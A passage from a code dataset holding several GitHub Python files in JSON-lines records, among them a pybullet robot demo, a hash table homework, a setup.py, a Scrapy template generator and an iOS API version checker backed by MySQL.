save_likes_to_csv(likes, filename='likes.csv'):\n with open(filename, 'w', newline='', encoding='utf-8') as csvfile:\n fieldnames = ['id', 'created_at', 'text', 'user']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for like in likes:\n writer.writerow(like)\n\n\nif __name__ == \"__main__\":\n likes = get_all_likes(api)\n save_likes_to_csv(likes)\n","repo_name":"nt92/memex","sub_path":"gpt-for-me/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"67"} +{"seq_id":"25289808044","text":"'''\n\n\n¿Qué son las expresiones lambda?\n• Son funciones anónimas.\nlambda parametros : expresion\n\n'''\n\n\ndef ordeno3(usuarios):\n \"\"\" Usamos sorted con una expresión lambda\"\"\"\n return sorted(usuarios, key=lambda usuario: usuario[0])\nusuarios = [\n('JonY BoY', 'Nivel3', 15),\n('1962', 'Nivel1', 12),\n('caike', 'Nivel2', 1020),\n('Straka^', 'Nivel2', 1020),\n]\nprint(ordeno3(usuarios))\n\nprint('-'*50)\n\nlista_de_acciones = [lambda x: x * 2, lambda x: x * 3]\nprint(f'los tipos de datos lambda son {type(lista_de_acciones[0])}')\n\nparam = 4\nfor accion in lista_de_acciones:\n print(accion(param))","repo_name":"facundoaquino/python-practice","sub_path":"lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30369964500","text":"\nimport pybullet as p\nimport time\n\n# open the GUI\np.connect(p.GUI)\n\n# load files and place them at the offsets\nturtle = p.loadURDF(\"urdf/most_simple_turtle.urdf\",[0,0,0])\nplane = p.loadURDF(\"urdf/plane_box.urdf\")\nbox1 = p.loadURDF(\"urdf/box.urdf\", [1,0,0])\nbox2 = p.loadURDF(\"urdf/box.urdf\", [1,1,0])\n\n# enable real time simulation\np.setRealTimeSimulation(1)\n\n# define gravity\np.setGravity(0,0,-10)\n\n# for debug print out the joints of the turtle\nfor j in range (p.getNumJoints(turtle)):\n\tprint(p.getJointInfo(turtle,j))\n\t\nforward=0\nturn=0\nwhile (1):\n\n\ttime.sleep(1./240.)\n\tkeys = p.getKeyboardEvents()\n\t\n\tleftWheelVelocity=0\n\trightWheelVelocity=0\n\tspeed=10\n\t\n\tfor k,v in keys.items():\n\n if (k == p.B3G_RIGHT_ARROW and (v&p.KEY_WAS_TRIGGERED)):\n turn = -0.5\n if (k == p.B3G_RIGHT_ARROW and (v&p.KEY_WAS_RELEASED)):\n turn = 0\n if (k == p.B3G_LEFT_ARROW and (v&p.KEY_WAS_TRIGGERED)):\n turn = 0.5\n if (k == p.B3G_LEFT_ARROW and (v&p.KEY_WAS_RELEASED)):\n turn = 0\n\n if (k == p.B3G_UP_ARROW and (v&p.KEY_WAS_TRIGGERED)):\n forward=1\n if (k == p.B3G_UP_ARROW and (v&p.KEY_WAS_RELEASED)):\n forward=0\n if (k == p.B3G_DOWN_ARROW and (v&p.KEY_WAS_TRIGGERED)):\n forward=-1\n if (k == p.B3G_DOWN_ARROW and (v&p.KEY_WAS_RELEASED)):\n forward=0\n\n\trightWheelVelocity+= (forward+turn)*speed\n\tleftWheelVelocity += (forward-turn)*speed\n\t\n\tp.setJointMotorControl2(turtle,0,p.VELOCITY_CONTROL,targetVelocity=leftWheelVelocity,force=1000)\n\tp.setJointMotorControl2(turtle,1,p.VELOCITY_CONTROL,targetVelocity=rightWheelVelocity,force=1000)\n","repo_name":"assadollahi/pyBulletIntro","sub_path":"turtleKeyboardMove.py","file_name":"turtleKeyboardMove.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"1338739300","text":"# Please see instructions.pdf for the description of this problem.\r\nfrom fixed_size_array import FixedSizeArray\r\nfrom cs5112_hash import cs5112_hash1\r\n\r\n# Implementation of a node in a singlely linked list.\r\n# DO NOT EDIT THIS CLASS\r\nclass SLLNode:\r\n def __init__(self, value, next_node=None):\r\n self.value = value\r\n self.next_node = next_node\r\n\r\n def set_next(self, node):\r\n self.next_node = node\r\n\r\n def get_next(self):\r\n return self.next_node\r\n\r\n def set_value(self, value):\r\n self.value = value\r\n\r\n def get_value(self):\r\n return self.value\r\n\r\n# An implementation of a hash table that uses chaining to handle collisions.\r\nclass HashTable:\r\n def __init__(self, initial_size=10, load_factor=.75):\r\n # DO NOT EDIT THIS CONSTRUCTOR\r\n if (initial_size < 0) or (load_factor <= 0) or (load_factor > 1):\r\n raise Exception(\"size must be greater than zero, and load factor must be between 0 and 1\")\r\n self.array_size = initial_size\r\n self.load_factor = load_factor\r\n self.item_count = 0\r\n self.array = FixedSizeArray(initial_size)\r\n\r\n # Inserts the `(key, value)` pair into the hash table, overwriting any value\r\n # previously associated with `key`.\r\n # Note: Neither `key` nor `value` may be None (an exception will be raised)\r\n def insert(self, key, value):\r\n # YOUR CODE HERE\r\n if key == None:\r\n raise Exception('Key cannot be None!')\r\n if value == None:\r\n raise Exception('Value cannot be None!')\r\n k = cs5112_hash1(key)%self.array_size\r\n pointer = self.array.get(k)\r\n node = SLLNode((key,value))\r\n if pointer==None:\r\n self.array.set(k, node)\r\n else:\r\n while pointer.get_next()!= None:\r\n if pointer.get_value()[0]== key:\r\n pointer.set_value((key,value))\r\n return\r\n pointer = pointer.get_next()\r\n pointer.set_next(node)\r\n self.item_count += 1\r\n # if self.item_count/self.array_size >= self.load_factor:\r\n # self._resize_array()\r\n \r\n \r\n # Returns the value associated with `key` in the hash table, or None if no\r\n # such value is found.\r\n # Note: `key` may not be None (an exception will be raised)\r\n def get(self, key):\r\n # YOUR CODE HERE\r\n if key == None:\r\n raise Exception('Key cannot be None!')\r\n k = cs5112_hash1(key)%self.array_size\r\n start = self.array.get(k)\r\n while start != None and start.get_value()!= None:\r\n if start.get_value()[0] == key:\r\n return start.get_value()[1]\r\n start = start.get_next()\r\n return None\r\n \r\n # Removes the `(key, value)` pair matching the given `key` from the map, if it\r\n # exists. If such a pair exists in the map, the return value will be the value\r\n # that was removed. If no such value exists, the method will return None.\r\n # Note: `key` may not be None (an exception will be raised)\r\n def remove(self, key):\r\n # YOUR CODE HERE\r\n # REWRITE!!!\r\n if key == None:\r\n raise Exception('Key cannot be None!')\r\n k = cs5112_hash1(key)%self.array_size\r\n prev = curr = self.array.get(k)\r\n if curr != None:\r\n while curr.get_next()!= None:\r\n if curr.get_value()[0]== key:\r\n if curr.get_next()==None:\r\n prev.set_next(None)\r\n else:\r\n prev.set_next(curr.get_next())\r\n self.item_count-=1\r\n return curr.get_value()\r\n else:\r\n prev = curr\r\n curr = curr.get_next()\r\n else:\r\n return None\r\n\r\n # Returns the number of elements in the hash table.\r\n def size(self):\r\n # YOUR CODE HERE\r\n # raise NotImplementedError()\r\n return self.item_count\r\n\r\n # Internal helper function for resizing the hash table's array once the ratio\r\n # of stored mappings to array size exceeds the specified load factor.\r\n def _resize_array(self):\r\n # YOUR CODE HERE\r\n orgsize = self.array_size\r\n orgarray = self.array\r\n\r\n self.array_size *= 2\r\n self.array = FixedSizeArray(self.array_size)\r\n self.item_count = 0\r\n\r\n for i in range(orgsize):\r\n orgelem = orgarray.get(i)\r\n if orgelem != None:\r\n self.insert(orgelem[0],orgelem[1])\r\n\r\n\r\n # Internal helper function for accessing the array underlying the hash table.\r\n def _get_array(self):\r\n # DO NOT EDIT THIS FUNCTION\r\n return self.array\r\n","repo_name":"ziyuqiu/Algo","sub_path":"HW2/hashtable_chaining.py","file_name":"hashtable_chaining.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24329838505","text":"from setuptools import setup\n\nimport os\nimport sys\n\nname = 'djangorestframework-flatbuffers'\npackage = 'rest_framework_flatbuffers'\ndescription = 'Flatbuffer serialization for Django Rest Framework'\nurl = 'https://github.com/sideshowdave7/django-rest-framework-flatbuffers'\nauthor = 'David Hurst'\nauthor_email = 'sideshowdave7@gmail.com'\nlicense = 'BSD'\ninstall_requires = ['djangorestframework',\n 'flatbuffers'\n ]\n\n\ndef get_packages(package):\n \"\"\"\n Return root package and all sub-packages.\n \"\"\"\n return [dirpath\n for dirpath, dirnames, filenames in os.walk(package)\n if os.path.exists(os.path.join(dirpath, '__init__.py'))]\n\n\ndef get_package_data(package):\n \"\"\"\n Return all files under the root package, that are not in a\n package themselves.\n \"\"\"\n walk = [(dirpath.replace(package + os.sep, '', 1), filenames)\n for dirpath, dirnames, filenames in os.walk(package)\n if not os.path.exists(os.path.join(dirpath, '__init__.py'))]\n\n filepaths = []\n for base, filenames in walk:\n filepaths.extend([os.path.join(base, filename)\n for filename in filenames])\n return {package: filepaths}\n\n\nif sys.argv[-1] == 'publish':\n os.system(\"python setup.py sdist upload\")\n args = {'version': '0.1'}\n print(\"You probably want to also tag the version now:\")\n print(\" git tag -a %(version)s -m 'version %(version)s'\" % args)\n print(\" git push --tags\")\n sys.exit()\n\nsetup(\n name=name,\n version='0.1',\n url=url,\n license=license,\n description=description,\n author=author,\n author_email=author_email,\n packages=get_packages(package),\n package_data=get_package_data(package),\n install_requires=install_requires,\n classifiers=[\n \"Development Status :: 1 - Development\",\n \"Environment :: Web Environment\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Framework :: Django\",\n ],\n)\n","repo_name":"sideshowdave7/django-rest-framework-flatbuffers","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"3205421759","text":"from tkinter import Menu\n\n\nclass MenuSite:\n def __init__(self, root, toolbar_site):\n self.root = root\n self.sub_menus = {}\n self.toolbar = toolbar_site\n self.root_menu = Menu(self.root)\n self.root.config(menu=self.root_menu)\n\n def add_item(self, menu_label, item, action):\n if self.sub_menus.__contains__(menu_label):\n self.sub_menus[menu_label].add_command(label=item, command=action)\n else:\n sub_menu = Menu(self.root_menu) # sub menu\n self.root_menu.add_cascade(label=menu_label, menu=sub_menu)\n sub_menu.add_command(label=item, command=action)\n self.sub_menus[menu_label] = sub_menu\n","repo_name":"Phiponacci/crypto-app","sub_path":"ui/menu_system.py","file_name":"menu_system.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"44258735852","text":"import json\nimport datetime\nimport dml\nimport prov.model\nimport provenance\nimport uuid\nimport sys\n\n#auth\nclient = dml.pymongo.MongoClient()\nrepo = client.repo\nrepo.authenticate('linshan_luoty','linshan_luoty')\nauth = json.loads(open(sys.argv[1]).read())\n\nzip_location_crimes_db\t= repo['linshan_luoty'+'.'+'zip_location_crimes']\nzip_avg_earnings_db = repo['linshan_luoty'+'.'+'zip_avg_earnings']\n\nstartTime = datetime.datetime.now()\n\nzip_location_crimes = zip_location_crimes_db.find({},{\n\t'_id': False,\n\t'zip': True,\n\t'crimes': True,\n\t'longitude': True,\n\t'latitude': True,\n\t'region': True,\n\t})\n\nzip_location_crimes_earnings = []\nfor document in zip_location_crimes:\n\tavg_earning = zip_avg_earnings_db.find_one({'zip': document['zip']}, {'_id': False, 'avg_earning': True})\n\tif avg_earning is None: \n\t\tdocument['avg_earning'] = 0\n\telse:\n\t\tdocument['avg_earning'] = avg_earning['avg_earning']\n\tzip_location_crimes_earnings.append(document)\n\n# export zip_location_crimes_earnings to JSON\nf = open('zip_location_crimes_earnings.json','w')\nf.write(json.dumps(zip_location_crimes_earnings, indent=4))\nf.close()\n\n# save it to a permanent folder\nrepo.dropPermanent(\"zip_location_crimes_earnings\")\nrepo.createPermanent(\"zip_location_crimes_earnings\")\nrepo['linshan_luoty'+'.'+'zip_location_crimes_earnings'].insert_many(zip_location_crimes_earnings)\n\nzip_location_crimes_earnings_sorted = repo['linshan_luoty'+'.'+'zip_location_crimes_earnings'].find({},{\n\t'_id': False,\n\t'zip': True,\n\t'crimes': True,\n\t'longitude': True,\n\t'latitude': True,\n\t'region': True,\n\t'avg_earning': True,\n\t}).sort([('avg_earning', pymongo.ASCENDING)])\n\nf = open('zip_location_crimes_earnings_sorted.json','w')\nf.write(json.dumps(list(zip_location_crimes_earnings_sorted), indent=4))\nf.close()\n\nendTime = datetime.datetime.now()\n\nstartTime = None\nendTime = None\n\n# Create the provenance document describing everything happening\n# in this script. Each run of the script will generate a new\n# document describing that invocation event. This information\n# can then be used on subsequent runs to determine dependencies\n# and \"replay\" everything. The old documents will also act as a\n# log.\ndoc = provenance.init()\ndoc.add_namespace('alg', 'https://data-mechanics.s3.amazonaws.com/linshan_luoty/algorithm/') # The scripts in / format.\ndoc.add_namespace('dat', 'https://data-mechanics.s3.amazonaws.com/linshan_luoty/data/') # The data sets in / format.\ndoc.add_namespace('ont', 'https://data-mechanics.s3.amazonaws.com/ontology#') # 'Extension', 'DataResource', 'DataSet', 'Retrieval', 'Query', or 'Computation'.\ndoc.add_namespace('log', 'https://data-mechanics.s3.amazonaws.com/log#') # The event log.\ndoc.add_namespace('bdp', 'https://data.cityofboston.gov/resource/')\n\nthis_script = doc.agent('alg:merge_zip_crime_earnings', {prov.model.PROV_TYPE:prov.model.PROV['SoftwareAgent'], 'ont:Extension':'py'})\n\nzip_location_crimes = doc.entity('dat:zip_location_crimes', {prov.model.PROV_LABEL:'Zip Location Crimes', prov.model.PROV_TYPE:'ont:DataSet'})\nzip_avg_earning = doc.entity('dat:zip_avg_earnings', {prov.model.PROV_LABEL:'Zips Average Earnings', prov.model.PROV_TYPE:'ont:DataSet'})\n\nmerge_zip_crime_earnings = doc.activity('log:a'+str(uuid.uuid4()), startTime, endTime, {prov.model.PROV_LABEL: \"Merge zips, crimes, locations, and earnings.\"})\ndoc.wasAssociatedWith(merge_zip_crime_earnings, this_script)\ndoc.usage(merge_zip_crime_earnings, zip_location_crimes, startTime, None,\n {prov.model.PROV_TYPE:'ont:Computation'\n }\n )\ndoc.usage(merge_zip_crime_earnings, zip_avg_earning, startTime, None,\n {prov.model.PROV_TYPE:'ont:Computation'\n }\n )\n\nzip_location_crimes_earnings = doc.entity('dat:zip_location_crimes_earnings', {prov.model.PROV_LABEL:'Zips with Crime and Earnings', prov.model.PROV_TYPE:'ont:DataSet'})\ndoc.wasAttributedTo(zip_location_crimes_earnings, this_script)\ndoc.wasGeneratedBy(zip_location_crimes_earnings, merge_zip_crime_earnings, endTime)\ndoc.wasDerivedFrom(zip_location_crimes_earnings, zip_location_crimes, merge_zip_crime_earnings, merge_zip_crime_earnings, merge_zip_crime_earnings)\ndoc.wasDerivedFrom(zip_location_crimes_earnings, zip_avg_earning, merge_zip_crime_earnings, merge_zip_crime_earnings, merge_zip_crime_earnings)\n\nrepo.record(doc.serialize()) # Record the provenance document.\nprovenance.update(doc)\nprint(doc.get_provn())\n\t\nrepo.logout()\n","repo_name":"data-mechanics/course-2016-spr-proj","sub_path":"linshan_luoty/merge_zip_crime_earnings.py","file_name":"merge_zip_crime_earnings.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"23677986866","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport pymysql\nimport os\nimport linecache\nimport re\nimport functools\n\n#打开数据库连接\ndb = pymysql.connect(\"localhost\",\"root\",\"ljh@123456\",\"sdkdatabase\",unix_socket=\"/tmp/mysql.sock\")\n#创建游标对象\ncursor = db.cursor()\n\ndef version_cmp(a, b):\n\tif(a[0] > b[0]):\n\t\treturn 1\n\telse:\n\t\treturn -1\n\ndef FindProperty(property_name, interface_name, version_low_limit, version_up_limit, version_id, version_range, super_interface_names):\n\tif(interface_name == \"NSObject\"):\n\t\tprint(\"back to root\")\n\telse:\n\t\tmysql_1 = \"SELECT super_interface_name, version_id FROM interface_data_table where interface_name = '%s' ORDER BY super_interface_name, CONVERT(version_id,DECIMAL(12,1))\" % interface_name\n\t\ttry:\n\t\t\tcursor.execute(mysql_1)\n\t\t\tresults = cursor.fetchall()\n\t\t\tif(len(results) > 0):\n\t\t\t\tsuper_interface_dic = []\n\t\t\t\ttemp_name = results[0][0]\n\t\t\t\ttemp_version = results[0][1]\n\t\t\t\tsuper_interface_dic.append([results[0][0],results[0][1]])\n\t\t\t\tcount = 0\n\t\t\t\tfor row in results:\n\t\t\t\t\tif(row[0] != temp_name):\n\t\t\t\t\t\tsuper_interface_dic[count].append(temp_version)\n\t\t\t\t\t\tsuper_interface_dic.append([row[0],row[1]])\n\t\t\t\t\t\ttemp_name = row[0]\n\t\t\t\t\t\tcount = count + 1\n\t\t\t\t\ttemp_version = row[1]\n\t\t\t\tsuper_interface_dic[count].append(temp_version)\n\t\t\t\t#print(super_interface_dic)\n\t\t\t\tfor dic_member in super_interface_dic:\n\t\t\t\t\tprint(dic_member)\n\t\t\t\t\tif(float(dic_member[1]) <= float(version_up_limit) and float(version_low_limit) <= float(dic_member[2])):\n\t\t\t\t\t\ttemp_inherit_range = [max(float(dic_member[1]),float(version_low_limit)),min(float(dic_member[2]),float(version_up_limit))]\n\t\t\t\t\t\tif(float(version_id) <= float(temp_inherit_range[1])):\n\t\t\t\t\t\t\tprint(temp_inherit_range)\n\t\t\t\t\t\t\tcheck_again_sql = \"SELECT * FROM property_data_table WHERE property_name = '%s' AND interface_name = '%s' ORDER BY CONVERT(version_id,DECIMAL(12,1))\" % (property_name, dic_member[0])\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tcursor.execute(check_again_sql)\n\t\t\t\t\t\t\t\tresults = cursor.fetchall()\n\t\t\t\t\t\t\t\tif(len(results) > 0):\n\t\t\t\t\t\t\t\t\tprint(\"find it in super super interface\")\n\t\t\t\t\t\t\t\t\tif(float(results[0][4]) <= float(temp_inherit_range[1]) and float(temp_inherit_range[0]) <= float(results[len(results)-1][4])):\n\t\t\t\t\t\t\t\t\t\ttemp_version_range = [max(float(results[0][4]),float(temp_inherit_range[0])),min(float(results[len(results)-1][4]), float(temp_inherit_range[1]))]\n\t\t\t\t\t\t\t\t\t\tversion_range.append(temp_version_range)\n\t\t\t\t\t\t\t\t\t\tsuper_interface_names.append(dic_member[0])\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tFindProperty(property_name, dic_member[0], temp_inherit_range[0], temp_inherit_range[1], version_id, version_range)\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\tprint(\"find property error 2\")\n\t\texcept:\n\t\t\tprint(\"find property error 1\")\n\ndef PropertyCheck(line, data_file_path, save_file_path):\n\tinformation = line.split(\"\\t\")\n\tfile_name = information[0]\n\tproperty_name = information[1]\n\tinterface_name = information[2]\n\tsuper_interface_name = information[3]\n\tproperty_type = information[4]\n\tproperty_pos = information[5]\n\tversion_id = information[6][ : information[6].rfind(\"\\n\")]\n\tprint(\"---\" + interface_name + \"---\" + property_name)\n\t#初步选择,判断当前属性是否属于当前接口:\n\tsql_1 = \"SELECT * FROM property_data_table WHERE property_name = '%s' AND interface_name = '%s' ORDER BY CONVERT(version_id,DECIMAL(12,1))\" % (property_name, interface_name)\n\ttry:\n\t\tcursor.execute(sql_1)\n\t\tresults = cursor.fetchall()\n\t\tif(len(results) > 0):\n\t\t\tsave_file_path.write(\"文件名:\" + file_name + \"\\t属性名:\" + property_name + \"\\t位置:\" + property_pos + \"\\t接口名:\" + interface_name + \"\\t父类接口:\" + super_interface_name + \"\\n版本限制:\" + results[0][4])\n\t\t\tfor row in results:\n\t\t\t\tsave_file_path.write(\"\\t\" + row[4])\n\t\t\tsave_file_path.write(\"\\n程序中对使用该属性的版本限制为:\" + version_id + \"\\n\")\n\t\t\tif float(version_id) >= float(results[0][4]):\n\t\t\t\tsave_file_path.write(\"✅:该属性的使用符合版本限制要求\\n\\n\")\n\t\t\telse:\n\t\t\t\tsave_file_path.write(\"❌:该属性的使用不符合版本限制要求\\n\\n\")\n\t\telse:\n\t\t\tsql_2 = \"SELECT super_interface_name, version_id FROM interface_data_table where interface_name = '%s' ORDER BY super_interface_name, CONVERT(version_id,DECIMAL(12,1))\" % interface_name\n\t\t\tversion_range = []\n\t\t\tsuper_interface_names = []\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql_2)\n\t\t\t\tresults = cursor.fetchall()\n\t\t\t\t#对父类遍历\n\t\t\t\tif(len(results) > 0):\n\t\t\t\t\tsuper_interface_dic = []\n\t\t\t\t\ttemp_name = results[0][0]\n\t\t\t\t\ttemp_version = results[0][1]\n\t\t\t\t\tsuper_interface_dic.append([results[0][0],results[0][1]])\n\t\t\t\t\tcount = 0\n\t\t\t\t\tfor row in results:\n\t\t\t\t\t\tif(row[0] != temp_name):\n\t\t\t\t\t\t\tsuper_interface_dic[count].append(temp_version)\n\t\t\t\t\t\t\tsuper_interface_dic.append([row[0],row[1]])\n\t\t\t\t\t\t\ttemp_name = row[0]\n\t\t\t\t\t\t\tcount = count + 1\n\t\t\t\t\t\ttemp_version = row[1]\n\t\t\t\t\tsuper_interface_dic[count].append(temp_version)\n\t\t\t\t\tfor dic_member in super_interface_dic:\n\t\t\t\t\t\tif(float(version_id) <= float(dic_member[2])):\n\t\t\t\t\t\t\tprint(\"father:\" + dic_member[0])\n\t\t\t\t\t\t\tsql_3 = \"SELECT * FROM property_data_table WHERE property_name = '%s' AND interface_name = '%s' ORDER BY CONVERT(version_id,DECIMAL(12,1))\" % (property_name, dic_member[0])\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tcursor.execute(sql_3)\n\t\t\t\t\t\t\t\tresults = cursor.fetchall()\n\t\t\t\t\t\t\t\tif(len(results) > 0):\n\t\t\t\t\t\t\t\t\tprint(\"find it in super interface\")\n\t\t\t\t\t\t\t\t\tif(float(results[0][4]) <= float(dic_member[2]) and float(dic_member[1]) <= float(results[len(results)-1][4])):\n\t\t\t\t\t\t\t\t\t\ttemp_version_range = [max(float(results[0][4]),float(dic_member[1])),min(float(results[len(results)-1][4]), float(dic_member[2]))]\n\t\t\t\t\t\t\t\t\t\tversion_range.append(temp_version_range)\n\t\t\t\t\t\t\t\t\t\tsuper_interface_names.append(dic_member[0])\n\t\t\t\t\t\t\t\t\tprint(temp_version_range)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tprint(\"find father again\")\n\t\t\t\t\t\t\t\t\tFindProperty(property_name, dic_member[0], dic_member[1], dic_member[2], version_id, version_range, super_interface_names)\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\tprint(\"find error 3\")\n\t\t\texcept:\n\t\t\t\tprint(\"find error 2\")\n\t\t\tprint(version_range)\n\t\t\tif(len(version_range) > 0):\n\t\t\t\tversion_range = sorted(version_range, key=functools.cmp_to_key(version_cmp))\n\t\t\t\tsave_file_path.write(\"文件名:\" + file_name + \"\\t属性名:\" + property_name + \"\\t位置:\" + property_pos + \"\\t接口名:\" + interface_name + \"\\t父类接口:\" + super_interface_name + \"\\n属性继承自父类\" + super_interface_names[0] + \",版本限制:[\" + str(version_range[0][0]) + \",\" + str(version_range[0][1]) + \"]\")\n\t\t\t\tcount = 1\n\t\t\t\twhile(count < len(version_range)):\n\t\t\t\t\tsave_file_path.write(\",[\" + str(version_range[count][0]) + \",\" + str(version_range[count][1]) + \"]\")\n\t\t\t\t\tcount = count + 1\n\t\t\t\tsave_file_path.write(\"\\n程序中对使用该属性的版本限制为:\" + version_id + \"\\n\")\n\t\t\t\tif float(version_id) >= float(version_range[0][0]):\n\t\t\t\t\tsave_file_path.write(\"✅:该属性的使用符合版本限制要求\\n\\n\")\n\t\t\t\telse:\n\t\t\t\t\tsave_file_path.write(\"❌:该属性的使用不符合版本限制要求\\n\\n\")\n\t\t\telse:\n\t\t\t\tprint(\"this property couldn't be find\")\n\texcept:\n\t\tprint(\"find error 1\")\n\n\ndef InformationGet(data_file_path, save_file_path):\n\tdata_file = open(data_file_path,'r')\n\tline = data_file.readline()\n\tline_count = 1\n\twhile line:\n\t\tif(line_count % 2 == 1):\n\t\t\tPropertyCheck(line, data_file_path, save_file_path)\n\t\tline = data_file.readline()\n\t\tline_count = line_count + 1\n\nif __name__ == '__main__':\n\tdata_file_path = \"/Users/linjunhao/Desktop/complie_opt/TraversingOutput/wework_buildout/build_output_property.txt\"\n\tsave_file_name = \"/Users/linjunhao/Desktop/complie_opt/TraversingOutput/APICheck/property_check.txt\"\n\tsave_file_path = open(save_file_name,'w')\n\tprint(\"property check\")\n\tInformationGet(data_file_path, save_file_path)\n\tsave_file_path.close()\n\n#关闭数据库连接与游标对象\ndb.close()\ncursor.close()\n","repo_name":"Paladin1412/NOTE-1","sub_path":"my_work_xxido/APICheck/PropertyCheck.py","file_name":"PropertyCheck.py","file_ext":"py","file_size_in_byte":7845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31900310882","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n Author: Gaomin Wu / wugm@ruyi.ai\n Time: 2018/8/3 下午2:24\n TODO:\n\"\"\"\nimport os\nimport zipfile\nimport shutil\nfrom mako.template import Template\nimport settings\n\n\ndef add_zipfile(source_dir, output_filename):\n f = zipfile.ZipFile(output_filename, 'w', zipfile.ZIP_DEFLATED)\n for dirpath, dirnames, filenames in os.walk(source_dir):\n for filename in filenames:\n f.write(os.path.join(dirpath, filename))\n f.close()\n\n\nclass BaseTemplate(object):\n\n def __init__(self, template_name, output_name, output_dir, template_dir=\"templates\"):\n self.template = Template(filename=os.path.join(settings.BASE_DIR, template_dir, template_name),\n output_encoding=\"utf-8\")\n self.output_filename = os.path.join(output_dir, output_name)\n\n def render(self, *args, **kwargs):\n with open(self.output_filename, \"w+\") as f:\n f.write(self.template.render(**kwargs))\n\n\ndef generate_crawl_template(project, rule_fields, output_dir):\n t = BaseTemplate(template_name=\"scrapy.cfg.tpl\", output_name=\"scrapy.cfg\", output_dir=output_dir)\n t.render(**{\"project_name\": project.name})\n\n t = BaseTemplate(template_name=\"template/settings.py.tpl\", output_name=project.name + \"/settings.py\",\n output_dir=output_dir)\n t.render(**{\"project\": project})\n\n t = BaseTemplate(template_name=\"template/items.py.tpl\", output_name=project.name + \"/items.py\",\n output_dir=output_dir)\n t.render(**{\"rule_fields\": rule_fields})\n\n t = BaseTemplate(template_name=\"template/spiders/template.py.tpl\",\n output_name=project.name + \"/spiders/\" + project.name + \".py\", output_dir=output_dir)\n t.render(**{\"rule_fields\": rule_fields, \"project\": project})\n\n t = BaseTemplate(template_name=\"template/pipelines.py.tpl\", output_name=project.name + \"/pipelines.py\",\n output_dir=output_dir)\n t.render(**{\"rule_fields\": rule_fields, \"project\": project})\n\n t = BaseTemplate(template_name=\"template/middlewares/useragent_middleware.py.tpl\",\n output_name=project.name + \"/middlewares/useragent_middleware.py\", output_dir=output_dir)\n t.render()\n t = BaseTemplate(template_name=\"scripts.py.tpl\", output_name=\"scripts.py\", output_dir=output_dir)\n t.render(**{\"project\": project})\n\n\ndef start_project(project, rule_fields, output_dir=settings.OUTPUT_DIR):\n project_dir = os.path.join(output_dir, project.name)\n if os.path.exists(project_dir):\n shutil.rmtree(project_dir)\n os.makedirs(project_dir)\n # process result_dir, make dir if not exist\n result_dir = project.spider.result_dir\n if result_dir.startswith('.'):\n result_dir = os.path.join(project_dir, result_dir[2:])\n else:\n result_dir = result_dir\n if not os.path.exists(result_dir):\n os.makedirs(result_dir)\n project.spider.result_dir = result_dir\n sub_dir = os.path.join(project_dir, project.name)\n if os.path.exists(sub_dir):\n shutil.rmtree(sub_dir)\n os.makedirs(sub_dir)\n os.makedirs(os.path.join(sub_dir, \"spiders\"))\n os.makedirs(os.path.join(sub_dir, \"middlewares\"))\n open(os.path.join(sub_dir, \"__init__.py\"), \"w\").close()\n open(os.path.join(sub_dir, \"middlewares\", \"__init__.py\"), \"w\").close()\n open(os.path.join(sub_dir, \"spiders\", \"__init__.py\"), \"w\").close()\n project.sub_dir = sub_dir\n generate_crawl_template(project, rule_fields, project_dir)\n\n # add_zipfile(os.path.join(output_dir, project[\"name\"]), project_dir + \".zip\")\n\n\nif __name__ == '__main__':\n from settings import *\n from model import *\n\n project = {'name': 'TaiHe',\n 'pipelines': ['JsonWriterPipeline'],\n 'download_delay': 1,\n 'image_urls': 'image_srcs',\n 'images': 'images',\n 'spider': Spider({'name': 'taihe',\n 'result_dir': './result',\n 'domain': None,\n 'download_image': False,\n 'custom_settings': None,\n 'start_urls': 'http://music.taihe.com/artist'})\n }\n project = Project(project)\n # out_dir = os.path.join(OUTPUT_DIR, project.name)\n fields = [Field({'name': 'url', 'path': '//link', 'type': 'str'}),\n Field({'name': 'singerName', 'path': '//ul[@class=\"container\"]//a[contains(@href,\"artist\")]/@title',\n 'type': 'list', 'dup_filter': True})]\n rule = Rule({'rule': 'TaiHe',\n 'fields': fields,\n 'item_name': 'TaiHe',\n 'callback_func': 'parse_item'})\n start_project(project, [rule])\n","repo_name":"pattywgm/ScrapyMako","sub_path":"template_render/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23806259519","text":"def callatz(n):\n t = 